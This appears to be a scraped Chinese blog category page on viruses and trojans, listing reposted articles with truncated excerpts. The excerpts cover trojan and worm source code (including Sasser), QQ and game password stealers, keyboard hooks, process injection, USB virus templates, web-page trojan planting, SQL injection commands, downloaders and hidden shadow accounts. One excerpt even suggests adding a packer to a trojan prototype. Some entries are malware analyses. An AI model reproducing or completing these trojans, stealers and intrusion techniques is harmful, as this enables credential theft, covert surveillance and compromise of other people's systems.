![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
病毒木马
文章平均质量分 81
ccx_john
这个作者很懒,什么都没留下…
展开
-
新型K4宏病毒代码分析报告
最近据说是新型的K4宏病毒到处肆虐,感染了办公室不少.xls文件,杀又杀不干净。对此互比较感兴趣,花了点时间跟踪了一下代码,并作了简要注释,基本了解该病毒的行为: 以ToDOLE模块中的代码,在虚拟机XP+Excel2003下跟踪并注释了关键代码: '病毒行为主过程 Private Sub auto_open() Application.DisplayAle转载 2014-10-01 09:43:09 · 3578 阅读 · 1 评论 -
无dll无进程木马源代码
#include//#include#include #include #pragma comment(lib,"Shlwapi.lib")//参数结构 ; typedef struct _RemotePara{ DWORD dwLoadLibrary;DWORD dwFreeLibrary;DWORD dwGetProcAddress;DWORD dwGe转载 2014-03-31 19:58:48 · 695 阅读 · 0 评论 -
如何截取QQ密码和聊天内容、去掉QQ广告栏、添加QQ尾巴
前言思路分析进入QQ进程远程注入DLL截取QQ登录密码截取本机QQ账号和昵称截取聊天内容增加QQ尾巴去掉QQ广告栏郑重申明结束语前言中国网民没有不熟悉QQ的,QQ玩家没有不知道珊瑚虫和彩虹的去广告显IP版QQ的,有段时间QQ尾巴也很盛行,就是每次聊天的时候它自动在你的聊天文字后面加一段话,欺骗你的QQ网转载 2014-03-31 19:52:29 · 1327 阅读 · 0 评论 -
windows函数钩子实现
要求要了解PE文件结构,熟悉基本的windowsAPI。下面程序把原来需要调用user32.dll中的MessageBoxA函数用自己实现的MyMessageBox代替,也就是一个重定向的功能。 [cpp]// NormalProject.cpp : Defines the entry point for the application. // #include转载 2014-03-31 19:45:35 · 926 阅读 · 0 评论 -
VC++截取输入法输入信息钩子dll实现
我们在实现输入法的智能纠正的时候,需要获取输入法输入的信息,如何实现呢,钩子如下 [cpp] #include "windows.h" #include "imm.h" #include "stdio.h" //#define HOOK_API __declspec(dllexport) HHOO转载 2014-03-31 19:43:20 · 1247 阅读 · 0 评论 -
关于HOOK,如何通过钩子截获指定窗口的所有消息
SetWindowsHookEx 第三个参数为HINSTANCE,通过FindWindow找到指定窗口句柄后如何 得到该进程的HINSTANCE呢?这个参数应该是你调用SetWindowsHookEx的DLL的模块实例句柄,它可以经由DllMain入口的第一个参数得到。 HHOOK SetWindowsHookEx( int idHook,转载 2014-03-31 19:41:15 · 7351 阅读 · 0 评论 -
病毒分析必备工具及基本流程
快毕业了也应该给自己定个明确的方向,对于病毒分析这方面的知识确实还是感兴趣的,这里收集了一些资料,给大家分享一下。以下来自乌龟,略有改动先说说硬件:条件允许的情况下,2条不同网络运营商提供的线路,2台或以上的电脑,具体配置自己感觉满意就行虽然用虚拟机也可以,但难免某些恶意代码有虚拟机检测机制,所以能用真机就尽量用了必备工具:Windows XP(别嫌弃老,老有老转载 2014-03-04 16:06:43 · 987 阅读 · 0 评论 -
两款Android病毒应用代码分析
对应安卓,前景虽然不错,但给我的感觉就是市场有点混乱,不管好的还是差点甚至损人利己的应用都混在安卓应用市场中,近日在网上看到了联想应用安全检测与研究小组曝光了对两款安卓应用的病毒代码分析,在这里也呈现给大家。病毒应用一:疯狂四驱车 DreamRace4x4 Free检测结果:危险-PUSH广告/静默安装行为描述:该应用为一款免费竞速应用,画面较精美,流程也很流畅。经过乐商店转载 2014-03-02 09:00:23 · 2267 阅读 · 0 评论 -
如何在SYSTEM权限下实现屏幕监控
屏幕监控是远控软件的基本功能之一。版权声明作者:iprowq现在很多远控程序的服务端通常为DLL形式,通过远程线程注入等方法插入到services、svchost等SYSTEM权限的进程中去,而此时常规的屏幕监控就会失效(这是因为与SYSTEM权限进程关联的窗口站、桌面与普通进程不同)。如何才能在SYSTEM权限下实现屏幕监控呢?一、 屏幕监控的基本原理屏幕监控简单转载 2013-12-21 21:50:03 · 1699 阅读 · 1 评论 -
利用底层键盘钩子拦载任意按键(回调版)
前段时间我曾经写过一篇《利用底层键盘钩子屏蔽任意按键》,并放到了我的blog上。这篇文章的题目中把“屏蔽”改成了“拦截”,显然要比以前的版本强一些了。对于以前写的那个DLL,有一个不够理想的地方,就是仅仅能实现屏蔽。如果想在屏蔽之前加入一些“小动作”,就只能修改DLL,在LowLevelKeyboardProc函数中添加代码,实现新的功能。但这样显然不够灵活,这样的DLL也不具备一般性了。所以我自转载 2014-03-31 19:49:09 · 746 阅读 · 0 评论 -
一个简单的木马原型基础代码
一个简单的木马原型基础代码添加上自己的XXX,加上变态的壳,做点小修改,就可以.....#include#pragma comment(lib,"ws2_32.lib")#include#include #pragma comment(lib,"Shlwapi.lib")#include #include #include //参数结构 ;转载 2014-03-31 19:56:02 · 2698 阅读 · 0 评论 -
利用鼠标键盘钩子截获密码。
利用鼠标键盘钩子截获密码。源码示例:http://zeena.nease.net/soft/GetPass_Src.rar钩子能截获系统并得理发送给其它应用程序的消息,能完成一般程序无法完成的功能。掌握钩子的编程方法是很有必要的钩子分类 :1、WH_CALLWNDPROC和WH_CALLWNDPROCRET: 使你可以监视发送到窗口过程的消息3、WH_DEBUG转载 2014-03-31 19:48:03 · 1068 阅读 · 0 评论 -
VC U盘病毒模版
当然不是我写的,但会仿写:// MyVirus2.cpp : Defines the entry point for the application.//// MyVirus1.cpp : Defines the entry point for the application.//// WindowsXP2.cpp : Defines the entry point转载 2014-09-14 14:00:39 · 1136 阅读 · 0 评论 -
VC++盗号木马源码分析
VC++ 网游dll盗号木马源码2009-09-06 12:19前段时间,在lonkil前辈的网站上看到的一款DLL网游木马源码,确实佩服...(幸亏这类牛人没走这道儿,不然中国网民会死得很惨的~~~~)/** main.cpp **/#include BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C}; BYTE转载 2014-08-16 14:29:50 · 2518 阅读 · 0 评论 -
暴风一号 病毒 源码学习
On Error Resume Next '//屏蔽出错信息,发生错误时继续向下执行Dim Fso,WshShell '//定义了两个变量'//创建并返回对 Automation 对象的引用。'//CreateObject(servername.typename [, location])'//servername 必选项。提供对象的应用程序名称。'//typename 必转载 2014-09-07 10:04:59 · 1689 阅读 · 0 评论 -
如何简单地找回保存在浏览器里的密码
一个简单的议题,也是同学们比较常遇到的问题,怎样找回保存在浏览器的“自动填写表单”功能中的密码。最容易想到的当然是抓包。一般的网站数据包里密码就是明文的,不过有些却也不是,可能是经过hash之后传递的(多数大网站)。 还有些浏览器自带此功能,但总有诸多限制。比如chrome需要输入当前windows密码: 猎豹浏览器需要输入之前设置的手势安全锁:转载 2014-07-11 11:19:31 · 3578 阅读 · 0 评论 -
堆溢出学习笔记
0x00 概述本文从程序实例出发,展示了XP SP1下的堆溢出+代码执行,XP SP3下的堆溢出+内存任意写,主要面向{已经掌握缓冲区溢出原理,希望进一步了解堆溢出原理的初学者}、{就是想找个堆溢出例子跑一遍的安全爱好者}以及{跑不通各种堆溢出书籍示例代码、非得跑通代码才看的进去书的搜索者}本笔记参考自:http://net-ninja.net/article/2011/Sep/0转载 2014-07-11 11:23:11 · 1537 阅读 · 0 评论 -
进程保护(带源码)
标 题: 【原创】进程保护(带源码)作 者: winnip时 间: 2010-04-28,09:34:48链 接: http://bbs.pediy.com/showthread.php?t=111885标 题: 【原创】进程保护(带源码)作 者: winnip时 间: 2010-04-30,15:30:58链 接: http://bbs.pediy.com/sho转载 2014-07-06 15:08:39 · 1429 阅读 · 0 评论 -
震荡波病毒C语言源码
#include #include #include #include #include #define NORM "\033[00;00m" #define GREEN "\033[01;32m" #define YELL "\033[01;33m" #define RED "\033[01;31m" #define BANNER转载 2014-07-06 15:50:29 · 2749 阅读 · 0 评论 -
怎样处理79MB的msdrvload.jpg病毒
最近在论坛看到好多反馈msdrvload.jpg报告为病毒,删除后重启又出现,就算用文件粉碎器删除也无济于事,这个jpg文件有79MB。工具/原料金山毒霸2011 SP3Windows注册表编辑器regeditprocexpQQ远程桌面协助步骤/方法1远程转载 2013-12-14 22:07:14 · 586 阅读 · 0 评论 -
APT对传统反病毒技术的威胁和我们的应对尝试
APT对传统反病毒技术的威胁和我们的应对尝试引用: http://blog.csdn.net/antiy_seak/article/details/8254080注:这是根据笔者10月20日在CNCC2012中国计算机大会信息安全专题论坛速记稿,整理增删而成。安天实验室 江海客(肖新光) 1. 引言APT(Advanced Persistent Threat,高转载 2013-12-12 11:29:40 · 1278 阅读 · 0 评论 -
挂马方法大全
一:框架挂马二:js文件挂马首先将以下代码document.write("");保存为xxx.js,则JS挂马代码为三:js变形加密muma.txt可改成任意后缀四:body挂马五:隐蔽挂马top.document.body.innerHTML = top.document.body.innerHTML + '转载 2013-12-07 14:26:52 · 2527 阅读 · 0 评论 -
Natas.4744幽灵王病毒的分析
文章作者:罗云彬 防黑网.www.zzfhw.com 防黑网.www.zzfhw.com 防黑网.www.zzfhw.com病毒介绍: 防黑网.www.zzfhw.com 防黑网.www.zzfhw.com Natas 病毒,长度 4744 字节,有的地方有把它称为 4744 病毒,由于病毒是用了变型技术,本身的形态几乎有无穷多种,使杀毒软件总漏掉一两个,不知什么时候又冒了出转载 2013-11-11 12:29:54 · 6599 阅读 · 0 评论 -
黑客之门的魅力:感染与加载 [转]
适合读者:黑器爱好者、入侵爱好者、编程爱好者前置知识:黑客之门的基本功能蝴蝶:学习黑客技术很关键的一点就在于不断地学习先进的技术,不断地创造出新的东西,这样才能在飞速发展的网络技术中占领自己的一席之地。最近大家关注的黑兵器有些什么呢?黑客之门估计是大多数人关注的目标,因为它太厉害了,厉害到它不但是个功能超强的后门,同时它还有很多思想都是比较新颖的,值得大家学习。正好本文作者通过自己转载 2013-11-06 16:48:05 · 813 阅读 · 0 评论 -
把自身插入到IE进程里的代码
#include #include #pragma comment(lib,"ntdll.lib")typedef long NTSTATUS;NTSYSAPINTSTATUSNTAPIZwUnmapViewOfSection( HANDLE ProcessHandle, PVOID BaseAddress );typede转载 2013-09-14 15:05:53 · 699 阅读 · 0 评论 -
关于三线程防杀的一些思想和VC代码
我们有一个主进程Main.exe 和一个DLL文件 KernelSoft.DLL, Main.exe启动的时候,会查看C:\\windows\\下面有没有我们的2个文件,如果没有就复制当前文件夹的文件过去,并设置为系统文件并隐藏,我们会查找我们注入的进程中有没有KernelSoft.dll,如果没有,那么表示我是第一次启动Main.exe, 我们注入KernelSoft..然后会创建一个线程W转载 2013-09-14 15:08:28 · 674 阅读 · 0 评论 -
端口复用的WXHSHELL源代码
#include "stdafx.h"#include #include #include #include #include #include #pragma comment (lib, "Ws2_32.lib")#pragma comment (lib, "urlmon.lib")#define MAX_USER 100 // 最大客户端连接数#d转载 2013-09-14 15:06:11 · 1003 阅读 · 0 评论 -
盗Q过程分析(待完善,仅用于分析)
#include #include #include "resource.h"char qqid[32] = "\0";char qqpass[64] = "\0"; //保存用户输入的QQ密码HWND g_hWnd = NULL;RECT g_qq_IDRt,g_qq_PassRt,g_qq_LoginRt,g_qq_CancelRt,g_qq_DlgRt;HB转载 2013-08-25 16:31:59 · 1130 阅读 · 0 评论 -
无权限文件夹及文件的删除办法
<br />症状:"属性"对话框中"安全"选项卡没有,如图示:<br /> <br />该文件夹没有任何用户能访问,用Cacls赋权限失败,显示:<br />ACCESS_DENIED:filename<br />文件名,目录名或全表语法不正确.<br />解决办法:<br />首先让Windows显示"安全"选项卡,文件夹选项-查看,去掉""前的勾,确定.<br /> <br /> <br />这样删不掉的"新建文件夹"属性窗口就能看见安全选项卡了.<br />然后点"高级",切换到"所有者"选项卡,选a转载 2011-04-17 14:43:00 · 1446 阅读 · 0 评论 -
注入命令 手工注入命令大全
1.判断是否有注入;and 1=1 ;and 1=22.初步判断是否是mssql ;and user>03.注入参数是字符'and [查询条件] and ''='4.搜索时没过滤参数的'and [查询条件] and '%25'='5.判断数据库系统;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) f转载 2013-12-07 15:41:24 · 655 阅读 · 0 评论 -
诡异的RunOnce病毒启动项和神奇的URL Protocol
整理磁盘发现之前有个有趣的流氓招数忘记分享了,每次看到新鲜的东东都感慨黑暗势力的层出不穷的招数,比某些安全厂商是不是自相残杀好多了.电脑日常使用过程中我们经常输入开头为http ftp,点击诸如ed2k的链接,每个链接的背后都会执行相应的功能.如http 通过iexplore.exe,ed2k通过QQ旋风打开..这次是病毒作者利用这个特性来实现隐蔽加载病毒躲避查杀1 相遇URL Protoco转载 2013-12-07 13:42:52 · 2604 阅读 · 0 评论 -
DNS劫持和DNS污染的区别
我们知道,某些网络运营商为了某些目的,对DNS进行了某些操作,导致使用ISP的正常上网设置无法通过域名取得正确的IP地址。常用的手段有:DNS劫持和DNS污染。 什么是DNS劫持 DNS劫持就是通过劫持了DNS服务器,通过某些手段取得某域名的解析记录控制权,进而修改此域名的解析结果,导致对该域名的访问由原IP地址转入到修改后的指定IP,其结果就是对特定的网址不能访问或访问的是假网址,从转载 2013-12-08 22:52:20 · 851 阅读 · 0 评论 -
Web攻防系列教程之跨站脚本攻击和防范技巧详解
XSS跨站脚本攻击一直都被认为是客户端Web安全中最主流的攻击方式。因为Web环境的复杂性以及XSS跨站脚本攻击的多变性,使得该类型攻击很难彻底解决。那么,XSS跨站脚本攻击具体攻击行为是什么,又该如何进行有效的防范呢?本文对此进行了有针对性的具体实例分析。跨站脚本攻击(Cross Site Scripting)是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影转载 2013-12-07 15:56:37 · 1454 阅读 · 0 评论 -
做一个困难重重的hta下载者
作者:lcx一、先说本blog上有两个比较新颖的vbs下载者,一个是利用CDO.Message组件做的,参见http://hi.baidu.com/myvbscript/blog/item/b64592267c8e4c118b82a102.html;另一个是用Microsoft.XMLDOM做的,参见http://hi.baidu.com/myvbscript/blog/item/b64592转载 2013-12-07 14:25:17 · 1445 阅读 · 0 评论 -
机器狗写入到userinit.exe文件的下载者源码(c及汇编)
器狗源码(C语言的)// Test.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"//==============================================================================#include typedef struct _PARTITION_ENTRY{ U转载 2013-12-07 14:10:24 · 874 阅读 · 0 评论 -
Cmd模式下的入侵技术大全
Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。 本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。 文件传输 对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件。由于蠕虫病毒流行,连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护,通过ip转载 2013-12-07 15:43:49 · 885 阅读 · 0 评论 -
神秘的影子帐号揭秘
影子帐号: 见名思义,帐号具有隐蔽性,不容易被发现(只是在一定程度上)。即一般的菜鸟发现不了。 多余的话我在这里就不说了,进入正题: 首先,我们需要在命令提示符窗口即就是dos下创建一个用户。 需要以下命令: net user $a 123 /add(这里的$符号是唯一的,可以理解为隐藏的条件,密码为123) 命令执行成功后,可以关闭命令提示符窗口了。 回到桌面,右击我转载 2013-12-07 15:39:38 · 674 阅读 · 0 评论 -
网站入侵思路(初级黑客渗透篇)
网站入侵思路(初级黑客渗透篇) 1,〓经典注入〓 通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断,如果and 1=1正常返回页面,1=2错误,或者找不到,那么就存在注入点 2,〓万能密码OR漏洞〓 万能密码'or'='or',可以用转载 2013-12-07 14:49:28 · 1132 阅读 · 0 评论 -
一句话图片木马
首先应该有图片一张(文件名为1.gif)。ASP一句话一个(文件名为1.asp)。一句话客户端一个。小马等再用CMD下将ASP和GIF进行合并。命令如下。copy /b 1.asp+1.gif asp.gif将会生成asp.gif。一句话图片木马一个。他的作用应该是在有后台密码的情况下添加文章,上传图片木马。然后找到图片地址。用一句话客户端进行连接。传小马。传大马。一句话客转载 2013-12-07 14:48:14 · 4037 阅读 · 0 评论 -
程序从DOS/bios驻留内存到WINNT下监视读入内存数据
<br /> <br />创建时间:2008-04-01<br />文章属性:原创<br />文章提交:cheng5103 (cheng_5103_at_126.com)<br /><br />作者:成松林<br />QQ:179641795<br />Email:cheng_5103@126.com<br />注意:欢迎大家转载,请大家转载注明原出处和作者信息.发篇文章不容易..大家请保留作者信息.<br /><br /><br /><br />.586p转载 2011-04-17 13:42:00 · 915 阅读 · 0 评论